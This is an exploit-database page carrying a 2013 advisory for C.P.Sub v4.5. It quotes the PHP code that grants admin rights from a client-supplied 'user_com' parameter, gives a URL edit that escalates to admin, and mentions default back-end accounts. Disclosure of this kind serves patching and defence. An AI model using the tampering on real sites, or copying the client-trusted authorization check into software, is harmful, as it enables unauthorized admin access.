header-logo
Suggest Exploit
vendor:
C.P.Sub
by:
Chako
7,5
CVSS
HIGH
Improper Authentication and Misconfiguration
287, 200
CWE
Product Name: C.P.Sub
Affected Version From: v4.5
Affected Version To: v4.5
Patch Exists: YES
Related CWE: N/A
CPE: a:cooltey:c.p.sub
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2013

C.P.Sub <= v4.5 Misconfiguration and Improper Authentication

C.P.Sub <= v4.5 use 'user_com=' parameter to identify if the user has admin privilege. Therefore an attacker could simply change the value for 'user_com=' parameter to gain admin privilege. There are some default accounts for C.P.Sub <= v4.5 that allows an attacker to access back-end management page. It could lead to further attack.

Mitigation:

Ensure that authentication is properly implemented and that default accounts are not used.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication
# Date: 2013/6/27
# Exploit Author: Chako
# Vendor Homepage: http://www.cooltey.org/ping/php.php
# Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip
# Version: <= v4.5
# Tested on: Windows 7 
#
#
####################################################################

Improper Authentication:
==========================================

Description:
    C.P.Sub <= v4.5 use "user_com=" parameter to identify if the user has admin privilege.
	Therefore an attacker could simply change the value for "user_com=" parameter to gain admin privilege.


/check.php (LINE: 36-44)
--------------------------------------------------------------
if($_GET[user_com] != "")
{
  $user_com = $_GET[user_com];
}elseif($_POST[user_com] != "")
{
  $user_com = $_POST[user_com];
}
if($user_com == "biggest")
{
--------------------------------------------------------------


Exploit:
--------------------------------------------------------------

change
http://Example_Target/info.php?cookie=yes&user_com=second

to
http://Example_Target/info.php?cookie=yes&user_com=biggest



Misconfiguration
==========================================
There are some default accounts for C.P.Sub <= v4.5 that allows an attacker
to access back-end management page. It could lead to further attack.